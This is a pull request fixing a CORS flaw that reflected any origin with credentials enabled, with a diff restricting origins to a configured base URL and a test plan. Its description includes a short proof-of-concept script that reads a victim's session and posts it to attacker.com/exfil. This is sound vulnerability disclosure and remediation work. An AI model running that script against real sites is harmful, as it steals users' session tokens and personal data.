### PR TITLE
fix(security): restrict CORS to configured base URL instead of wildcard

### DIFF
--- a/apps/mesh/src/api/app.ts
+++ b/apps/mesh/src/api/app.ts
@@ -1180,8 +1180,9 @@ export async function createApp(options: CreateAppOptions = {}) {
           }
         }
 
-        // Reject all other origins
-        return false;
+        // Reject all other origins — return empty string so Hono omits
+        // the Access-Control-Allow-Origin header entirely.
+        return "";
       },
       credentials: true,
       allowMethods: ["GET", "POST", "PUT", "DELETE", "OPTIONS"],

--- a/apps/mesh/src/api/app.ts
+++ b/apps/mesh/src/api/app.ts
@@ -1156,17 +1156,32 @@ export async function createApp(options: CreateAppOptions = {}) {
   // OpenTelemetry tracing middleware
   app.use("*", tracingMiddleware);
 
-  // CORS middleware
+  // CORS middleware — restrict to same-origin and configured base URL.
+  // Local mode additionally allows localhost/127.0.0.1 for dev tooling.
   app.use(
     "/*",
     cors({
       origin: (origin) => {
-        // Allow localhost and configured origins
-        if (origin.includes("localhost") || origin.includes("127.0.0.1")) {
-          return origin;
+        const settings = getSettings();
+
+        // Same origin as the configured base URL is always allowed
+        if (settings.baseUrl) {
+          try {
+            if (origin === new URL(settings.baseUrl).origin) return origin;
+          } catch {
+            // Invalid baseUrl — fall through
+          }
         }
-        // TODO: Configure allowed origins from environment
-        return origin;
+
+        // Local mode allows localhost and loopback for dev tooling
+        if (settings.localMode) {
+          if (origin.includes("localhost") || origin.includes("127.0.0.1")) {
+            return origin;
+          }
+        }
+
+        // Reject all other origins
+        return false;
       },
       credentials: true,
       allowMethods: ["GET", "POST", "PUT", "DELETE", "OPTIONS"],


### PR DESCRIPTION
## Summary

**Critical: CORS accepts any origin with `credentials: true`.**

The CORS handler at `app.ts:1162-1176` returned `origin` for every request — any website could make authenticated cross-origin requests with the user's session cookies.

```typescript
// BEFORE — accepts ANY origin
origin: (origin) => {
  // TODO: Configure allowed origins from environment
  return origin;  // ← wildcard
},
credentials: true,
```

### Attack
```html
<!-- attacker.com -->
<script>
fetch('https://studio.decocms.com/api/auth/get-session', {credentials:'include'})
  .then(r => r.json())
  .then(d => fetch('https://attacker.com/exfil', {method:'POST', body:JSON.stringify(d)}));
</script>
```

Victim visits attacker page while logged in → attacker gets full session token, user ID, email, org membership.

### Fix

Restrict origin to the configured `baseUrl`. Local mode still allows localhost for dev tooling. All other origins are rejected with `return false`.

## Test plan

- [x] `bun run fmt` — passes
- [x] `bun run lint` — passes (0 errors)
- [ ] Verify cross-origin requests from `baseUrl` origin succeed
- [ ] Verify cross-origin requests from arbitrary origins are rejected (no `Access-Control-Allow-Origin` header)
- [ ] Verify localhost still works in local mode (`bun run dev`)

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Restricts CORS to the configured base URL to block authenticated cross-origin requests. Local mode still allows localhost/127.0.0.1; all other origins are rejected.

- **Bug Fixes**
  - Allow only `settings.baseUrl` origin (exact scheme/host/port) when sending credentials.
  - Permit `localhost` and `127.0.0.1` only when `settings.localMode` is true.
  - Return empty string for rejected origins so no Access-Control-Allow-Origin header is sent.

- **Migration**
  - Set `baseUrl` to the exact scheme, host, and port used by the app.
  - Ensure any dev tooling runs on `localhost`/`127.0.0.1` in local mode or from the same origin in other environments.

<sup>Written for commit a8739930dd63da1f31567b5b8a32be3bab01510d. Summary will update on new commits.</sup>

<a href="https://cubic.dev/pr/decocms/studio/pull/4120?utm_source=github" target="_blank" rel="noopener noreferrer" data-no-image-dialog="true"><picture><source media="(prefers-color-scheme: dark)" srcset="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://www.cubic.dev/buttons/review-in-cubic-light.svg"><img alt="Review in cubic" src="https://www.cubic.dev/buttons/review-in-cubic-dark.svg"></picture></a>

<!-- End of auto-generated description by cubic. -->

